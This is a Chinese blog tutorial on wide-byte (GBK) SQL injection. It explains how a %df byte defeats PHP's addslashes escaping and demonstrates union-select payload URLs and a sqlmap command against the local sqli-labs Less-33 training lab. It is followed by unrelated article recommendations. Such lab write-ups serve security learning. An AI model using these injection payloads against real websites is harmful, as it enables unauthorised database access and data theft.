【安全】P 2-19 宽字节SQL注入

最新推荐文章于 2022-07-27 11:20:34 发布
最新推荐文章于 2022-07-27 11:20:34 发布
阅读量566 收藏
点赞数
分类专栏: 安全大师 文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_David_Z/article/details/113818286
版权

目录

0X01 宽字节注入基础

GBK 占用两字节
ASCII占用一字节
PHP中编码为GBK,函数执行添加的是ASCII编码,MYSQL默认字符集是GBK等宽字节字符集。
%DF’ :会被PHP当中的addslashes函数转义为“%DF’” ,“\”既URL里的“%5C”,那么也就是说,“%DF’”会被转成“%DF%5C%27”倘若网站的字符集是GBK,MYSQL使用的编码也是GBK的话,就会认为“%DF%5C%27”是一个宽字符。也就是“縗’”

0X02 宽字节注入代码分析

Less-33 Bypass addslashes()
在这里插入图片描述

采用了addslashes函数进行了转义
网站采用的是GBK编码方式

0X03 宽字节SQL注入演示

id=1%df’ --+
在这里插入图片描述

http://127.0.0.1/sqli-labs/Less-33/?id=-1%df%27%20%20union%20select%201,2,3%20–+
在这里插入图片描述

http://127.0.0.1/sqli-labs/Less-33/?id=-1%df%27%20%20union%20select%201,database(),3%20–+
在这里插入图片描述

同样的配方构建payload

0X04 sqlmap安全检测

sqlmap.py -u “URL?id=1%df%27” --search --level 3 --risk 1 --thread 10
在这里插入图片描述
-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

骆驼实验室
关注
专栏目录
25-1 SQL 注入攻击 - cookie base64编码注入
weixin_43263566的博客
03-03 242
原理Base64编码的原理是将三个字节的二进制数据(共24位)转换成四个ASCII字符。由于每个ASCII字符可以表示64种状态(2^6),刚好可以用来表示24位二进制数据。这种编码方式通过将二进制数据划分为每组6位,然后将这6位的值转换为对应的Base64字符,从而实现编码过程。字符集大写英文字母:A-Z小写英文字母:a-z数字:0-9两个额外的符号,在不同的系统中可能有所不同,通常是和此外,为了使编码的结果能够被整除为4,Base64编码可能会在最后使用字符进行填充。编码表索引字符。
【burpsuite安全练兵场-服务端1】SQL注入-17个实验(全)
最新发布
wangluoanquan111的博客
01-26 1327
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
C++:19---sizeof运算符
热门推荐
董哥的黑板报
04-10 50万+
功能:以字节位单位,返回一个表达式或一个数据类型所占的字节数 返回值类型:是size_t类型 sizeof有无括号: sizeof不加括号,后面不可以直接跟数据类型 sizeof加括号,后面既可以跟表达式也可以跟数据类型 注意事项 对引用类型执行sizeof运算得到被引用对象所占空间的大小 对指针执行sizeof运算得到指针本身所占空间大小 对解引用指针执行sizeof运...
size_t, ssize_t等的定义
secsky的专栏
02-08 1万+
ssize_t是signed size_t,而size_t是标准C库中定义的,应为unsigned int。socket_t: 数据类型"socklen_t"和int应该具有相同的长度.否则就会破坏 BSD套接字层的填充.POSIX开始的时候用的是size_t, Linus Torvalds(他希望有更多的人,但显然不是很多) 努力向他们解释使用size_t是完全错误的,因为在64位结构中 si
动态类型变形:==> dtw 中的错误在 19 ns=size(s,1);-matlab开发
05-29
请重述错误
4-19 css属性
weixin_30800987的博客
04-19 400
1、 margin 简写属性在一个声明中设置所有外边距属性。该属性可以有 1 到 4 个值。 说明 这个简写属性设置一个元素所有外边距的度,或者设置各边上外边距的度。 块级元素的垂直相邻外边距会合并,而行内元素实际上不占上下外边距。行内元素的的左右外边距不会合并。同样地,浮动元素的外边距也不会合并。允许指定负的外边距值,不过使用时要小心。 注释:允许使用负值。 1 margin...
sizeof() 内置类型
风平浪静看人生
10-12 3230
#include using namespace std;#define TRACE(S) cout int main(){     TRACE(int);           //4     TRACE(unsigned int);  //4     TRACE(long);          //4     TRACE(unsigned long); //4     cout       TR
sql注入--10http头注入
技术骨干小李的博客
07-27 649
**HTTP(HyperText Transfer Protocol,超文本传输协议)**是访问万维网使用的核心通信协议,也是今天所有Web应用程序使用的通信协议。最初,HTTP只是一个为获取基于文本的静态资源而开发的简单协议,后来人们以各种形式扩展和利用它.使其能够支持如今常见的复杂分布式应用程序。HTTP使用一种用于消息的模型:客户端送出一条请求消息,而后由服务器返回一条响应消息。该协议基本上不需要连接,虽然HTTP使用有状态的TCP协议作为它的传输机制,但每次请求与响应交换都会自动完成,并且可能使用不
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3122
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3160
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
移动尺寸
candyon的专栏
01-27 1652
①iPhone的设计尺寸 iPhone界面尺寸: 设备 分辨率 状态栏高度 导航栏高度 标签栏(工具栏)高度 iPhone6 plus设计版 1242 × 2208 60px 132px 146px iOS APP设计一稿支持iPhone5/iPhone6/Plus设计流程 iPh
常用的各种尺寸大小
mosesliu的专栏
04-18 791
三折页广告 标准尺寸 : (A4)210mm x 285mm 普通宣传册 标准尺寸 : (A4)210mm x 285mm 文件封套 标准尺寸 :220mm x 305mm 招贴画: 标准尺寸 :540mm x 380mm 挂旗 标准尺寸 :8 开 376mm x 265mm 4 开 540mm x 380mm 手提袋: 标准尺寸 :400...
VS2019_error: (-215:Assertion failed) size.width>0 && size.height>0 in function
瞎点技能树
01-04 606
建了个项目,开始就几个文件,后面又想分下类,就建了几个文件夹,然后本来都能正常运行的文件塞进各自文件夹后就运行报错 OpenCV(4.4.0) C:\Users\appveyor\AppData\Local\Temp\1\pip-req-build-nxx381if\opencv\modules\highgui\src\window.cpp:376: error: (-215:Assertion failed) size.width>0 && size.height>0 in
关于微信加解密illegal key size问题
heboy19的博客
10-15 5116
异常java.security.InvalidKeyException:illegal Key Size的解决方案:在官方网站下载JCE无限制权限策略文件,下载后解压,可以看到local_policy.jar和US_export_policy.jar以及readme.txt,如果安装了JRE,将两个jar文件放到%JRE_HOME%\lib\security目录下覆盖原来的文件;如果安装了JDK,
019:别叫,这个大整数已经很简化了!
weixin_34161064的博客
12-09 456
总时间限制: 1000ms 内存限制: 65536kB 描述 程序填空,输出指定结果 #include <iostream> #include <cstring> #include <cstdlib> #include <cstdio> using namespace std; const int MAX = 110;...
zoj1909 Square dfs+优化(参考别人的)
10-20 807
本以为自己对dfs了解的可以了,可是这道题,我还是参看了别人的代码,自己设计的dfs不论怎样跳出,一直TLE。。。伤不起啊。。。 里面是各种return。。。。。。 #include #include #include #include using namespace std; int vis[20],len[20],n,aver; int dfs(int i,int j,int
Exceptional C++ Style之19
李永亮的专栏
03-29 687
19条 对派生类施加规则       不要在析构函数中抛出异常,这是在《C++编程思想》中写的很明白的事情。不要使用异常规格,这在以前也看过,当然,目前没有足够的好处促使编写异常规格。       避免编写虚的操作符重载,具体原因我也没有看见。       需要对派生类加上限制的话,可以考虑在基类将其访问权限改为不可访问。尽量用编译期错误代替运行期错误。
FFmpeg关于nb_smples,frame_size以及profile的解释
朱韦刚(zhuweigangzwg)的技术博客
11-25 1万+
FFmpeg关于nb_smples,frame_size以及profile的解释 原来一直记得固定编码格式需要固定的sample,例如下面: 1) AAC: nb_samples和frame_size = 1024 一帧数据量:1024*2*av_get_bytes_per_sample(s16) = 4096个字节。 会编码:88200/(1024*2*av_get_bytes
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值